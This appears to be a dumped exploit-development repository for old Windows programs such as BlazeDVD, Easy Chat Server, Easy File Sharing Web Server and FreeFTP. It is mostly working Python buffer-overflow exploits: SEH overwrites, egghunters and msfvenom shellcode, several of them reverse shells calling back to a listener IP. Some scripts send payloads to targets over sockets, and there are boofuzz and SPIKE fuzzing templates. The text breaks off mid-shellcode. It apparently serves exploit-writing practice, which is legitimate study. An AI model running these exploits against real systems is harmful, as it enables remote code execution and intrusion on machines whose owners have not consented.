├── BlazeDVD 5 Professional └── exploit.py ├── DVDx Player ├── crash.py └── exploit.py ├── Easy CD DVD └── exploit.py ├── Easy Chat Server 3.1 └── exploit.py ├── Easy File Management Web Server 5.3 ├── exploit.spk └── post-request.txt ├── Easy File Sharing FTP Server 3.5 ├── boofuzz.py └── fuzz.spk ├── Easy File Sharing Web Server 7.2 └── exploit.py ├── Easy RM to MP3 Converter 2.7.3.7 └── exploit.py ├── Eureka └── exploit.py ├── FreeFTP 1.0.8 ├── boofuzz.py ├── exploit.py └── fuzz.py ├── FreeFloat └── exploit.py ├── KarjaSoft Sami FTP Server 2.0.1 ├── boofuzz.py └── exploit.py ├── KnFTP Server 1.0.0 └── exploit.py ├── Kolibri v2.0 HTTP Server ├── exploit.py └── fuzz ├── Millenium MP3 Studio ├── crash.py └── exploit.py ├── Minialic HTTP └── boofuzz.py ├── Minishare ├── exploit.py └── fuzz ├── ProSysInfo TFTP Server TFTPDWIN 0.4.2 └── fuzz.py ├── QuickZip 4.60 ├── explanation └── exploit.py ├── R v3.4.4 └── exploit.py ├── README.md ├── Ricoh DC Software DL-10 FTP Server └── boofuzz.py ├── SolarFTP └── fuzz.py ├── Soritong MP3 Player 1.0 ├── exploit.py └── payload.py ├── Vulnserver ├── gmon.py ├── others ├── trun-exploit.py └── trun-fuzz.py └── Xitami Webserver 2.5 ├── exploit.py └── fuzz /BlazeDVD 5 Professional/exploit.py: -------------------------------------------------------------------------------- 1 | file = "exploit.plf" 2 | 3 | offset = "A"*608 4 | nseh = "\xeb\x1e\x90\x90" 5 | seh = "\x34\x31\x02\x64" 6 | nops = "\x90" * 24 7 | 8 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 9 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 10 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 11 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 12 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 13 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 14 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 15 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 16 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 17 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 18 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 19 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 20 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 21 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 22 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 23 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 24 | "\x63\x03\x6b") 25 | 26 | buffer = offset + nseh +seh + nops + calc 27 | 28 | f = open(file,'w') 29 | f.write(buffer) 30 | f.close() 31 | -------------------------------------------------------------------------------- /DVDx Player/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | filename = "kalisa.plf" 4 | 5 | #buffer = "A" * 1000 6 | 7 | f = open(filename, 'w') 8 | f.write(buffer) 9 | f.close() 10 | -------------------------------------------------------------------------------- /DVDx Player/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | filename = "kalisa-final.plf" 4 | 5 | offset = "A" * 608 6 | nextSEH = "\xeb\x06\x90\x90" #breakpoint 7 | # 0x61602ADB 8 | SEH = "\xDB\x2A\x60\x61" #pop-pop-ret from EPG.dll 9 | # msfvenom --platform windows -a x86 -p windows/shell_reverse_tcp LHOST=192.168.1.17 LPORT=9999 -e x86/shikata_ga_nai -b '\x00\x0A\x0D\x1A' -f python -v shellcode 10 | shellcode = "" 11 | shellcode += "\xba\x1e\xfe\x32\xc4\xda\xce\xd9\x74\x24\xf4\x5f" 12 | shellcode += "\x33\xc9\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\x49" 13 | shellcode += "\xf0\xd0\x31\x89\xe4\x97\xba\x71\xf5\xf7\x33\x94" 14 | shellcode += "\xc4\x37\x27\xdd\x77\x88\x23\xb3\x7b\x63\x61\x27" 15 | shellcode += "\x0f\x01\xae\x48\xb8\xac\x88\x67\x39\x9c\xe9\xe6" 16 | shellcode += "\xb9\xdf\x3d\xc8\x80\x2f\x30\x09\xc4\x52\xb9\x5b" 17 | shellcode += "\x9d\x19\x6c\x4b\xaa\x54\xad\xe0\xe0\x79\xb5\x15" 18 | shellcode += "\xb0\x78\x94\x88\xca\x22\x36\x2b\x1e\x5f\x7f\x33" 19 | shellcode += "\x43\x5a\xc9\xc8\xb7\x10\xc8\x18\x86\xd9\x67\x65" 20 | shellcode += "\x26\x28\x79\xa2\x81\xd3\x0c\xda\xf1\x6e\x17\x19" 21 | shellcode += "\x8b\xb4\x92\xb9\x2b\x3e\x04\x65\xcd\x93\xd3\xee" 22 | shellcode += "\xc1\x58\x97\xa8\xc5\x5f\x74\xc3\xf2\xd4\x7b\x03" 23 | shellcode += "\x73\xae\x5f\x87\xdf\x74\xc1\x9e\x85\xdb\xfe\xc0" 24 | shellcode += "\x65\x83\x5a\x8b\x88\xd0\xd6\xd6\xc4\x15\xdb\xe8" 25 | shellcode += "\x14\x32\x6c\x9b\x26\x9d\xc6\x33\x0b\x56\xc1\xc4" 26 | shellcode += "\x6c\x4d\xb5\x5a\x93\x6e\xc6\x73\x50\x3a\x96\xeb" 27 | shellcode += "\x71\x43\x7d\xeb\x7e\x96\xd2\xbb\xd0\x49\x93\x6b" 28 | shellcode += "\x91\x39\x7b\x61\x1e\x65\x9b\x8a\xf4\x0e\x36\x71" 29 | shellcode += "\x9f\xf0\x6f\x78\x4e\x99\x6d\x7a\x57\x56\xfb\x9c" 30 | shellcode += "\xfd\x78\xad\x37\x6a\xe0\xf4\xc3\x0b\xed\x22\xae" 31 | shellcode += "\x0c\x65\xc1\x4f\xc2\x8e\xac\x43\xb3\x7e\xfb\x39" 32 | shellcode += "\x12\x80\xd1\x55\xf8\x13\xbe\xa5\x77\x08\x69\xf2" 33 | shellcode += "\xd0\xfe\x60\x96\xcc\x59\xdb\x84\x0c\x3f\x24\x0c" 34 | shellcode += "\xcb\xfc\xab\x8d\x9e\xb9\x8f\x9d\x66\x41\x94\xc9" 35 | shellcode += "\x36\x14\x42\xa7\xf0\xce\x24\x11\xab\xbd\xee\xf5" 36 | shellcode += "\x2a\x8e\x30\x83\x32\xdb\xc6\x6b\x82\xb2\x9e\x94" 37 | shellcode += "\x2b\x53\x17\xed\x51\xc3\xd8\x24\xd2\xf3\x92\x64" 38 | shellcode += "\x73\x9c\x7a\xfd\xc1\xc1\x7c\x28\x05\xfc\xfe\xd8" 39 | shellcode += "\xf6\xfb\x1f\xa9\xf3\x40\x98\x42\x8e\xd9\x4d\x64" 40 | shellcode += "\x3d\xd9\x47" 41 | 42 | buffer = offset + nextSEH + SEH + "\x90" * 20 + shellcode 43 | 44 | f = open(filename, 'w') 45 | f.write(buffer) 46 | f.close() 47 | -------------------------------------------------------------------------------- /Easy CD DVD/exploit.py: -------------------------------------------------------------------------------- 1 | filename = "kalisa.txt" 2 | 3 | offset = "A"*1008 4 | nseh = "\xeb\x06\x90\x90" 5 | seh = "\xFB\x07\x01\x10" #Skinmagic.dll pop-pop-ret 6 | nops = "\x90"*24 7 | 8 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.18 LPORT=5555 --platform windows -a x86 -b "\x00\x0a\x0d" -f python -v shellcode 9 | 10 | shellcode = "" 11 | shellcode += "\xdd\xc0\xba\x86\x95\x98\xc4\xd9\x74\x24\xf4\x5e" 12 | shellcode += "\x2b\xc9\xb1\x52\x83\xc6\x04\x31\x56\x13\x03\xd0" 13 | shellcode += "\x86\x7a\x31\x20\x40\xf8\xba\xd8\x91\x9d\x33\x3d" 14 | shellcode += "\xa0\x9d\x20\x36\x93\x2d\x22\x1a\x18\xc5\x66\x8e" 15 | shellcode += "\xab\xab\xae\xa1\x1c\x01\x89\x8c\x9d\x3a\xe9\x8f" 16 | shellcode += "\x1d\x41\x3e\x6f\x1f\x8a\x33\x6e\x58\xf7\xbe\x22" 17 | shellcode += "\x31\x73\x6c\xd2\x36\xc9\xad\x59\x04\xdf\xb5\xbe" 18 | shellcode += "\xdd\xde\x94\x11\x55\xb9\x36\x90\xba\xb1\x7e\x8a" 19 | shellcode += "\xdf\xfc\xc9\x21\x2b\x8a\xcb\xe3\x65\x73\x67\xca" 20 | shellcode += "\x49\x86\x79\x0b\x6d\x79\x0c\x65\x8d\x04\x17\xb2" 21 | shellcode += "\xef\xd2\x92\x20\x57\x90\x05\x8c\x69\x75\xd3\x47" 22 | shellcode += "\x65\x32\x97\x0f\x6a\xc5\x74\x24\x96\x4e\x7b\xea" 23 | shellcode += "\x1e\x14\x58\x2e\x7a\xce\xc1\x77\x26\xa1\xfe\x67" 24 | shellcode += "\x89\x1e\x5b\xec\x24\x4a\xd6\xaf\x20\xbf\xdb\x4f" 25 | shellcode += "\xb1\xd7\x6c\x3c\x83\x78\xc7\xaa\xaf\xf1\xc1\x2d" 26 | shellcode += "\xcf\x2b\xb5\xa1\x2e\xd4\xc6\xe8\xf4\x80\x96\x82" 27 | shellcode += "\xdd\xa8\x7c\x52\xe1\x7c\xd2\x02\x4d\x2f\x93\xf2" 28 | shellcode += "\x2d\x9f\x7b\x18\xa2\xc0\x9c\x23\x68\x69\x36\xde" 29 | shellcode += "\xfb\x56\x6f\xe1\xe9\x3e\x72\xe1\x18\x0c\xfb\x07" 30 | shellcode += "\x48\x62\xaa\x90\xe5\x1b\xf7\x6a\x97\xe4\x2d\x17" 31 | shellcode += "\x97\x6f\xc2\xe8\x56\x98\xaf\xfa\x0f\x68\xfa\xa0" 32 | shellcode += "\x86\x77\xd0\xcc\x45\xe5\xbf\x0c\x03\x16\x68\x5b" 33 | shellcode += "\x44\xe8\x61\x09\x78\x53\xd8\x2f\x81\x05\x23\xeb" 34 | shellcode += "\x5e\xf6\xaa\xf2\x13\x42\x89\xe4\xed\x4b\x95\x50" 35 | shellcode += "\xa2\x1d\x43\x0e\x04\xf4\x25\xf8\xde\xab\xef\x6c" 36 | shellcode += "\xa6\x87\x2f\xea\xa7\xcd\xd9\x12\x19\xb8\x9f\x2d" 37 | shellcode += "\x96\x2c\x28\x56\xca\xcc\xd7\x8d\x4e\xfc\x9d\x8f" 38 | shellcode += "\xe7\x95\x7b\x5a\xba\xfb\x7b\xb1\xf9\x05\xf8\x33" 39 | shellcode += "\x82\xf1\xe0\x36\x87\xbe\xa6\xab\xf5\xaf\x42\xcb" 40 | shellcode += "\xaa\xd0\x46" 41 | 42 | buffer = offset + nseh + seh + nops + shellcode 43 | 44 | f = open(filename,'w') 45 | f.write(buffer) 46 | f.close() 47 | -------------------------------------------------------------------------------- /Easy Chat Server 3.1/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | ip = "192.168.1.9" 4 | port = 80 5 | 6 | # bad chars for het request \x00\x20\x0a\x0d 7 | 8 | 9 | offset = "A"*(221-4) 10 | nseh = "\xeb\x06\x90\x90" 11 | seh = "\xe7\x0f\x01\x10" #0x10010FE7 SSLEAY32.dll 12 | junk = "\x90"*16 13 | 14 | # msfvenom -p windows/exec cmd=calc.exdows -a x86 -e x86/alpha_mixed -b \x00\x0a\x0d\x20 -f python -v calc 15 | calc = "" 16 | calc += "\xdb\xd1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49" 17 | calc += "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37" 18 | calc += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" 19 | calc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" 20 | calc += "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x58\x68\x4c\x42" 21 | calc += "\x45\x50\x63\x30\x65\x50\x35\x30\x4d\x59\x68\x65\x44" 22 | calc += "\x71\x4f\x30\x75\x34\x4c\x4b\x52\x70\x34\x70\x6c\x4b" 23 | calc += "\x31\x42\x46\x6c\x4e\x6b\x66\x32\x45\x44\x6e\x6b\x62" 24 | calc += "\x52\x65\x78\x64\x4f\x6d\x67\x71\x5a\x44\x66\x45\x61" 25 | calc += "\x79\x6f\x4e\x4c\x47\x4c\x51\x71\x71\x6c\x76\x62\x46" 26 | calc += "\x4c\x61\x30\x6f\x31\x38\x4f\x46\x6d\x76\x61\x48\x47" 27 | calc += "\x6b\x52\x49\x62\x76\x32\x62\x77\x4c\x4b\x63\x62\x52" 28 | calc += "\x30\x4e\x6b\x31\x5a\x35\x6c\x4c\x4b\x50\x4c\x52\x31" 29 | calc += "\x32\x58\x4d\x33\x50\x48\x45\x51\x4b\x61\x76\x31\x6e" 30 | calc += "\x6b\x66\x39\x57\x50\x43\x31\x4e\x33\x4e\x6b\x53\x79" 31 | calc += "\x67\x68\x58\x63\x65\x6a\x63\x79\x4c\x4b\x30\x34\x6e" 32 | calc += "\x6b\x36\x61\x78\x56\x45\x61\x79\x6f\x6e\x4c\x79\x51" 33 | calc += "\x78\x4f\x46\x6d\x75\x51\x5a\x67\x64\x78\x49\x70\x44" 34 | calc += "\x35\x7a\x56\x73\x33\x61\x6d\x79\x68\x37\x4b\x61\x6d" 35 | calc += "\x77\x54\x72\x55\x6a\x44\x42\x78\x4c\x4b\x72\x78\x77" 36 | calc += "\x54\x65\x51\x7a\x73\x61\x76\x4e\x6b\x74\x4c\x70\x4b" 37 | calc += "\x4c\x4b\x52\x78\x55\x4c\x37\x71\x4b\x63\x4e\x6b\x56" 38 | calc += "\x64\x6c\x4b\x77\x71\x48\x50\x4e\x69\x62\x64\x34\x64" 39 | calc += "\x36\x44\x61\x4b\x73\x6b\x75\x31\x33\x69\x71\x4a\x76" 40 | calc += "\x31\x69\x6f\x4d\x30\x43\x6f\x31\x4f\x32\x7a\x4e\x6b" 41 | calc += "\x67\x62\x4a\x4b\x6e\x6d\x53\x6d\x53\x5a\x43\x31\x4e" 42 | calc += "\x6d\x6e\x65\x68\x32\x53\x30\x65\x50\x35\x50\x66\x30" 43 | calc += "\x70\x68\x65\x61\x6c\x4b\x50\x6f\x6b\x37\x59\x6f\x48" 44 | calc += "\x55\x6d\x6b\x38\x70\x6c\x75\x4e\x42\x43\x66\x52\x48" 45 | calc += "\x59\x36\x6d\x45\x4d\x6d\x6d\x4d\x79\x6f\x68\x55\x75" 46 | calc += "\x6c\x43\x36\x43\x4c\x64\x4a\x4d\x50\x4b\x4b\x39\x70" 47 | calc += "\x70\x75\x43\x35\x4d\x6b\x70\x47\x66\x73\x51\x62\x30" 48 | calc += "\x6f\x70\x6a\x45\x50\x71\x43\x59\x6f\x38\x55\x63\x53" 49 | calc += "\x33\x51\x42\x4c\x52\x43\x64\x6e\x51\x75\x63\x48\x43" 50 | calc += "\x55\x43\x30\x41\x41" 51 | 52 | 53 | buffer = offset + nseh + seh + junk + calc 54 | 55 | req = "GET /chat.ghp?username=" + buffer + "&password=&room=1&sex=2 HTTP/1.1\r\n" 56 | req += "User-Agent: Mozilla/4.0\r\n" 57 | req += "Host: 192.168.1.9:80\r\n" 58 | req += "Accept-Language: en-us\r\n" 59 | req += "Accept-Encoding: gzip, deflate\r\n" 60 | req += "Referer: http://192.168.1.136\r\n" 61 | req += "Connection: Keep-Alive\r\n\r\n" 62 | 63 | 64 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 65 | connect = s.connect((ip,port)) 66 | s.send(req) 67 | s.recv(1024) 68 | s.close() 69 | -------------------------------------------------------------------------------- /Easy File Management Web Server 5.3/exploit.spk: -------------------------------------------------------------------------------- 1 | s_string("POST /forum.ghp HTTP/1.1"); 2 | s_string("Host: "); 3 | s_string("192.168.1.6"); 4 | s_string("Connection: keep-alive"); 5 | s_string("Content-Length: 64"); 6 | s_string("Cache-Control: max-age=0"); 7 | s_string("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); 8 | s_string("Origin: http://192.168.1.6"); 9 | s_string("Upgrade-Insecure-Requests: 1"); 10 | s_string("User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"); 11 | s_string("Content-Type: application/x-www-form-urlencoded"); 12 | s_string("Referer: http://192.168.1.6/"); 13 | s_string("Accept-Encoding: gzip, deflate"); 14 | s_string("Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4"); 15 | s_string("Cookie: SESSIONID=29777; "); 16 | s_string("UserID="); 17 | s_string_variable("aaa"); 18 | s_string(; PassWD=); 19 | s_string_variable("aaa"); 20 | s_string("; frmUserName="); 21 | s_string_variable("aaa"); 22 | s_string("; frmUserPass="); 23 | s_string_variable("aa"); 24 | s_string("; rememberPass=202%2C197%2C208%2C215%2C201"); 25 | s_string("\r\n"); 26 | s_string("\r\n"); 27 | 28 | 29 | s_block_start("post"); 30 | s_string("frmLogin=true&frmUserName=tsdfg&frmUserPass=sdgfs&login=Login%21\r\n"); 31 | s_block_end("post"); 32 | sleep(1); 33 | -------------------------------------------------------------------------------- /Easy File Management Web Server 5.3/post-request.txt: -------------------------------------------------------------------------------- 1 | POST /forum.ghp HTTP/1.1 2 | Host: 192.168.1.6 3 | Connection: keep-alive 4 | Content-Length: 64 5 | Cache-Control: max-age=0 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 7 | Origin: http://192.168.1.6 8 | Upgrade-Insecure-Requests: 1 9 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 10 | Content-Type: application/x-www-form-urlencoded 11 | Referer: http://192.168.1.6/ 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 14 | Cookie: SESSIONID=29777; UserID=admin; PassWD=admin; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201 15 | -------------------------------------------------------------------------------- /Easy File Sharing FTP Server 3.5/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # boofuzz template for Solar FTP 2.1.1 PASV command 3 | 4 | from boofuzz import * 5 | 6 | host = "192.168.1.10" 7 | port = 21 8 | 9 | def main(): 10 | session = Session(target=Target(connection=SocketConnection(host, port, proto='tcp'))) 11 | 12 | s_initialize("user") 13 | s_static("USER") 14 | s_delim(" ") 15 | s_static("anonymous") 16 | s_static("\r\n") 17 | 18 | s_initialize("pass") 19 | s_static("PASS") 20 | s_delim(" ") 21 | s_string("test") 22 | s_static("\r\n") 23 | 24 | session.connect(s_get("user")) 25 | session.connect(s_get("user"), s_get("pass")) 26 | 27 | session.fuzz() 28 | if __name__ == "__main__": 29 | main() 30 | -------------------------------------------------------------------------------- /Easy File Sharing FTP Server 3.5/fuzz.spk: -------------------------------------------------------------------------------- 1 | s_string("USER"); 2 | s_string(" "); 3 | s_string("anonymous"); 4 | s_string("\r\n"); 5 | s_readline(); 6 | s_string("PASS"); 7 | s_string(" ,"); 8 | s_string_variable("kalisa"); 9 | s_string("\r\n"); 10 | s_readline(); 11 | -------------------------------------------------------------------------------- /Easy File Sharing Web Server 7.2/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket,sys 4 | 5 | host = "192.168.1.4" 6 | port = 80 7 | 8 | shellcode = ( 9 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 10 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 11 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 12 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 13 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 14 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 15 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 16 | "\x1c\x39\xbd" 17 | ) 18 | 19 | offset = "A"*4061 20 | nseh = "\xeb\x06\x90\x90" 21 | seh = "\x38\x88\x01\x10" #0x10018838 22 | junk = "D"*600 23 | 24 | buffer = offset + nseh + seh + "\x90"*8 + shellcode + "\x90"*8 + junk 25 | 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((host,port)) 28 | s.send("GET " + buffer + " HTTP/1.0\r\n\r\n") 29 | s.close() 30 | -------------------------------------------------------------------------------- /Easy RM to MP3 Converter 2.7.3.7/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # shellcode 4 | 5 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload 6 | buf = "" 7 | buf += "\xbd\xbb\x6d\x64\xfa\xd9\xc8\xd9\x74\x24\xf4\x5a\x33" 8 | buf += "\xc9\xb1\x31\x31\x6a\x13\x83\xea\xfc\x03\x6a\xb4\x8f" 9 | buf += "\x91\x06\x22\xcd\x5a\xf7\xb2\xb2\xd3\x12\x83\xf2\x80" 10 | buf += "\x57\xb3\xc2\xc3\x3a\x3f\xa8\x86\xae\xb4\xdc\x0e\xc0" 11 | buf += "\x7d\x6a\x69\xef\x7e\xc7\x49\x6e\xfc\x1a\x9e\x50\x3d" 12 | buf += "\xd5\xd3\x91\x7a\x08\x19\xc3\xd3\x46\x8c\xf4\x50\x12" 13 | buf += "\x0d\x7e\x2a\xb2\x15\x63\xfa\xb5\x34\x32\x71\xec\x96" 14 | buf += "\xb4\x56\x84\x9e\xae\xbb\xa1\x69\x44\x0f\x5d\x68\x8c" 15 | buf += "\x5e\x9e\xc7\xf1\x6f\x6d\x19\x35\x57\x8e\x6c\x4f\xa4" 16 | buf += "\x33\x77\x94\xd7\xef\xf2\x0f\x7f\x7b\xa4\xeb\x7e\xa8" 17 | buf += "\x33\x7f\x8c\x05\x37\x27\x90\x98\x94\x53\xac\x11\x1b" 18 | buf += "\xb4\x25\x61\x38\x10\x6e\x31\x21\x01\xca\x94\x5e\x51" 19 | buf += "\xb5\x49\xfb\x19\x5b\x9d\x76\x40\x31\x60\x04\xfe\x77" 20 | buf += "\x62\x16\x01\x27\x0b\x27\x8a\xa8\x4c\xb8\x59\x8d\xa3" 21 | buf += "\xf2\xc0\xa7\x2b\x5b\x91\xfa\x31\x5c\x4f\x38\x4c\xdf" 22 | buf += "\x7a\xc0\xab\xff\x0e\xc5\xf0\x47\xe2\xb7\x69\x22\x04" 23 | buf += "\x64\x89\x67\x67\xeb\x19\xeb\x46\x8e\x99\x8e\x96" 24 | 25 | filename="exploit.m3u" 26 | 27 | buffer = "A"*26075 28 | # 77E9F8F7 29 | buffer += "\xF7\xF8\xE9\x77" 30 | buffer += "\x90"*25 31 | buffer += buf 32 | 33 | textfile= open(filename,'w') 34 | textfile.write(buffer) 35 | textfile.close() 36 | -------------------------------------------------------------------------------- /Eureka/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | offset = "A" * 710 4 | ret = "\x10\xB3\x45\x7E" #0x7E45B310 USER32.dll jmp esp 5 | nops = "\x90" * 2000 6 | 7 | egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" 8 | "\x77\x30\x30\x74" # this is the egg: w00t 9 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") 10 | 11 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 12 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 13 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 14 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 15 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 16 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 17 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 18 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 19 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 20 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 21 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 22 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 23 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 24 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 25 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 26 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 27 | "\x63\x03\x6b") 28 | 29 | 30 | payload = "-ERR " + offset + ret + egghunter + nops + "w00tw00t" + calc 31 | 32 | # set up listener on port 110 33 | try: 34 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | s.bind(('', 110)) 36 | s.listen(1) 37 | print ("[*] Listening on port 110.") 38 | print ("[*] Have someone connect to you.") 39 | print ("[*] Type -c to exit.") 40 | conn, addr = s.accept() 41 | print '[*] Received connection from: ', addr 42 | 43 | while 1: 44 | conn.send(payload) 45 | conn.close() 46 | except: 47 | print ("[*] Connection issue!") 48 | -------------------------------------------------------------------------------- /FreeFTP 1.0.8/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from boofuzz import * 3 | from boofuzz import pedrpc 4 | 5 | host = "192.168.1.9" 6 | port = 21 7 | 8 | def main(): 9 | session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp'))) 10 | 11 | s_initialize("user") 12 | s_static("USER") 13 | s_delim(" ") 14 | s_static("anonymous") 15 | s_static("\r\n") 16 | 17 | s_initialize("pass") 18 | s_static("PASS") 19 | s_delim(" ") 20 | s_string("FUZZ") 21 | s_static("\r\n") 22 | 23 | session.connect(s_get("user")) 24 | session.connect(s_get("user"), s_get("pass")) 25 | 26 | session.fuzz() 27 | if __name__ == "__main__": 28 | main() 29 | -------------------------------------------------------------------------------- /FreeFTP 1.0.8/exploit.py: -------------------------------------------------------------------------------- 1 | import socket,sys 2 | 3 | host = "192.168.1.10" 4 | port= 21 5 | 6 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.17 LPORT=4444 -f c -v shell -b '\x0a\x0d' -e x86/shikata_ga_nai 7 | shell = ("\xda\xc6\xd9\x74\x24\xf4\xbf\x92\x9d\x35\x91\x58\x2b\xc9\xb1\x52\x31\x78\x17\x03\x78\x17\x83\x52\x99\xd7\x64\xae\x4a\x95\x87\x4e\x8b\xfa\x0e\xab\xba\x3a\x74\xb8\xed\x8a\xfe\xec\x01\x60\x52\x04\x91\x04\x7b\x2b\x12\xa2\x5d\x02\xa3\x9f\x9e\x05\x27\xe2\xf2\xe5\x16\x2d\x07\xe4\x5f\x50\xea\xb4\x08\x1e\x59\x28\x3c\x6a\x62\xc3\x0e\x7a\xe2\x30\xc6\x7d\xc3\xe7\x5c\x24\xc3\x06\xb0\x5c\x4a\x10\xd5\x59\x04\xab\x2d\x15\x97\x7d\x7c\xd6\x34\x40\xb0\x25\x44\x85\x77\xd6\x33\xff\x8b\x6b\x44\xc4\xf6\xb7\xc1\xde\x51\x33\x71\x3a\x63\x90\xe4\xc9\x6f\x5d\x62\x95\x73\x60\xa7\xae\x88\xe9\x46\x60\x19\xa9\x6c\xa4\x41\x69\x0c\xfd\x2f\xdc\x31\x1d\x90\x81\x97\x56\x3d\xd5\xa5\x35\x2a\x1a\x84\xc5\xaa\x34\x9f\xb6\x98\x9b\x0b\x50\x91\x54\x92\xa7\xd6\x4e\x62\x37\x29\x71\x93\x1e\xee\x25\xc3\x08\xc7\x45\x88\xc8\xe8\x93\x1f\x98\x46\x4c\xe0\x48\x27\x3c\x88\x82\xa8\x63\xa8\xad\x62\x0c\x43\x54\xe5\xf3\x3c\x57\xe4\x9b\x3e\x57\x17\x00\xb6\xb1\x7d\xa8\x9e\x6a\xea\x51\xbb\xe0\x8b\x9e\x11\x8d\x8c\x15\x96\x72\x42\xde\xd3\x60\x33\x2e\xae\xda\x92\x31\x04\